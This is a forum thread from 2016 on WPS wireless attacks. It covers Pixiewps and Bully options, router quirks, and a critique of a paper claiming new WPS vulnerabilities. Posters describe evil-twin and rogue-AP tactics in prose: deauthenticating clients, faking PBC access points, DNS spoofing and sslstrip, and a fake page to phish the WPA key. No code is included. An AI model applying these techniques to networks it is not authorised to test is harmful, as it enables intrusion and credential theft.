I don't have broadcom device or atheros device to check it out but at least that is the case for realtek and ralink.
That's pretty cool, we still learned something somehow ;)

aanarchyy
2016-01-19, 17:08
@kcdtv debug mode works just fine with bully, i had pixie with debug mode on for quite a while, just extra printing,

oh and i added --force to the pixiepws command, i wasn't aware that was still in as wiire had removed it from the
help.
also added the ESSID and BSSID to the final output per request of soxrok2212

wiire
2016-01-19, 20:50
If our ehash-1 and ehash2 are equals in our M3 message it means that only PBC is fully enabled and that PIN mode will not lead to anything.

Just to clarify, the PBC method is - protocol-wise - identical to the PIN method. The only difference is the method of activation (a button) and that the PIN is already known, being '00000000'.

I successfully recovered the WPA of my router after pressing the button, using Reaver and Pixiewps some time ago.

If you want you can pass me the data and I can try to to experiment a bit. But maybe the two equal hashes are part of the 'patching work' of the devs. We know for sure Realtek devices are weird.

kcdtv
2016-01-21, 00:26
Just to clarify, the PBC method is - protocol-wise - identical to the PIN method. The only difference is the method of activation (a button) and that the PIN is already known, being '00000000'.

ok :)

If you want you can pass me the data and I can try to to experiment a bit. But maybe the two equal hashes are part of the 'patching work' of the devs. We know for sure Realtek devices are weird.
And it is a .... ZTE ... low coast and low security.... with above all a touch from jazztel for who it took more than one year to understand that all their device had PIN 12345670 enabled.
So weirdness is expected...
here are the datas : http://www78.zippyshare.com/v/y3wuTRzz/file.html
if you need something more, just ask

also added the ESSID and BSSID to the final output per request of soxrok2212
The same guy that requested a tool for pixiedust one day ... i think i remember now... be carefull with him, you never know where it can stop! :D

soxrok2212
2016-01-24, 17:21
Glad to see it's all sorted out! :)

eddie
2016-02-01, 09:25
hi to all
I'm studying on WiFi vulnerabilities and specially on WPS. I found this ("") article on the web

Can it be a new attack or not?! it claims that:


even by completely disabling the WPS on the routers, all vulnerabilities are not covered

Laserman75
2016-02-01, 14:25
hi to all
I'm studying on WiFi vulnerabilities and specially on WPS. I found this (www.acsij.org/acsij/article/viewFile/67/63) article on the web

Can it be a new attack or not?! it claims that:

In the article, nothing is described new ;)

eddie
2016-02-01, 14:46
In the article, nothing is described new ;)

Really?? :D .So the name should be "repetitive attacks on WPS!!".....
i think first scenario is not possible ... But about second, is there any tools for performing that scenario in kali?

Where can I find documents for original source of this attacks??

soxrok2212
2016-02-01, 23:41
"But if the attacker could somehow change his role in this exchange and could be the enrollee, he can use two arbitrary values instead of E-Hash1 and E- Hash2 and sends it as M3 message."

First off, the author doesn't sound very informed on the topic in general. A little "somehow" magic and it should work, right? Unfortunately, that's not how the protocol works. Reminds me of the "Blackjack Attack" that was quickly deemed unsuccessful, http://méric.fr/blog/blackjack.html though they are using a rouge AP. I don't think it is possible.

As for the second attack, well, I don't really understand what they are trying to say. It is written in pretty poor English, though I can't point them out on this because it's just a language barrier.

The author should have done practical analysis of the suggested ideas instead of documenting theoretical analysis. Would've made much more interesting document if they found proof for any of the suggested ideas.

wiire
2016-02-02, 07:40
The fake AP attack to get the first half of the pin is nothing new. The procedure is described in the specification (2.02) as well in Bogard's slides. The problem with it is that usually one is never prompted to insert a WPS pin when trying to connect to a WPS AP.

The "second attack" is more interesting. Instead of setting up a fake AP with the Pin method, set up one with the PBC method (same name, same encryption) with a greater power level in attempt to cover the legitimate AP and disconnect the client (same procedure of an evil twin). Then when the user tries to connect, make the fake AP start a PBC session. The Windows victim computer should automatically starts a PBC WPS session, grab the new configuration and eventually automatically connect to the fake AP.

Now the attacker could potentially set up dns spoofing, sslstrip, redirection etc.

I honestly never tried, but this would be a flaw in Windows security rather than WPS.

eddie
2016-02-02, 10:37
@soxrok2212

thanks .I read that hypothetical "Blackjack" attack, but it's difference.I think theoretically first attack has no problem, but as @wiire said, practically it's not possible.

@wiire

thanks. Really helped me. I want to implement second attack to try it. Do you think this is worth trying?

carshiv
2016-02-02, 11:10
i tried cracking dlink router's pin with --force option but pin was not found . Means the router is in-vulnerable ? (Pixie version 1.2 , kali 2.0)

kcdtv
2016-02-02, 13:36
About this second "PBC" attack (4.2) "evil twin"
It is one of the "PBC Rogue attack" described by koala some time ago and It doesn't work as "smoothly" as they affirm.
Because windows offer the possibility of a PBC connection only the first time when you connect to an AP, just when you create a new profile.
So you have to create a fake AP where the essid is slightly changed otherwise windows will never activate the PBC connexion : It has to be a new profile.
Than it works, as it is a different name-AP, windows propose you to press the PBC on the router side and you could get the client connected to your fake AP
That's how it would look like from the victim side :
http://zupimages.net/up/14/14/dv0h.bmp
As you can see the legitimate profile Livebox-XXXX appears with a red cross ( effects of mdk3 + airebase used for desauth :p ) and the fake network reachable is livebox-XXXX (lower case instead of lower)
If the victim clic on "livebox (fake)" than it would be connected
http://zupimages.net/up/14/15/bf33.png
So it is not as simple and straight as they described and and depends on the user active intervention to fall in the trap.
Complete and documented tutorial here : [Tuto] Rogue AP discrète en full WPA avec hostapd (http://www.crack-wifi.com/forum/topic-10455-tuto-rogue-ap-discrete-en-full-wpa-avec-hostapd.html)
It is in french, sorry, but you have snapshots with kali linux every two lines and code blocks, so you will follow the story.

eddie
2016-02-02, 14:30
Because windows offer the possibility of a PBC connection only the first time when you connect to an AP, just when you create a new profile.

Not agree! I think whenever PBC support announced in beacons, windows offers the possibility of PBC connection. I tried it at home with my router.
Also there is no need to create fake AP with slightly changed ESSID, it's possible to have two access point(or more maybe!) with same ESSID and same encryption.

soxrok2212
2016-02-02, 15:18
Also in the event of using a Rouge AP, the best option would just be to redirect to a fake page requesting the WPA key, not the WPS pin. Both of the author's ideas are pretty useless to me, if a router supports WPS then 99.99% of the time it is running WPA2-CCMP and it would just be easier to grab the PSK and then from there just grab the WPS pin from the router config.

eddie
2016-02-02, 18:32
I think poor English in that article makes this misunderstanding. The goal in both idea is not requesting WPS pin instead of WPA key! I think wiire is completely right.

kcdtv
2016-02-03, 17:16
I think whenever PBC support announced in beacons, windows offers the possibility of PBC connection. I tried it at home with my router.
Maybe you use windows 8.1? Anyway i doubt that it changes anaything.
Koala did his tests with windows 7 and i did the test with windows 10
PBC connexion is just proposed for the first time you connect to the network.
Once you have a profile created windows just try the PMK and will not propose again PBC.
Even if you push the button on the router side...
I connect through PBC to a router that i sue for the test, once i am successfully connected I changed the WPA passphrase (simulating a fake AP with same bssid and essid) and i try to connect to my AP again
Windows network manager stop to try after a certain time and that it.
That's all you get... No PBC is proposed (as the profile is already created)

I think wiire is completely right.
No one said he is not :D
Both ideas are not news... the authors of the paper present them as new vulnerabilities and it has been demonstrated that it is not the case.

eddie
2016-02-03, 19:51
Maybe you use windows 8.1? Anyway i doubt that it changes anaything.
Koala did his tests with windows 7 and i did the test with windows 10
PBC connexion is just proposed for the first time you connect to the network.
Once you have a profile created windows just try the PMK and will not propose again PBC.
Even if you push the button on the router side...
I connect through PBC to a router that i sue for the test, once i am successfully connected I changed the WPA passphrase (simulating a fake AP with same bssid and essid) and i try to connect to my AP again
Windows network manager stop to try after a certain time and that it.
That's all you get... No PBC is proposed (as the profile is already created)

I found my mistake! you are completely right as well :D


Both ideas are not news... the authors of the paper present them as new vulnerabilities and it has been demonstrated that it is not the case.

exactly! So is there any tool for test this attack using kali or other linux OS?

I have another question : How can I get routers firmware source code?

soxrok2212
2016-02-03, 23:31
exactly! So is there any tool for test this attack using kali or other linux OS?


Either way, both are not vulnerabilities in WPS, I would just consider it a workaround. No there are no designated tools for this, though I'm assuming hostapd and some magic could make it work.



I have another question : How can I get routers firmware source code?

Either google the model number followed by "source code" or you could try extracting the compiled firmware with binwalk and look at the binaries.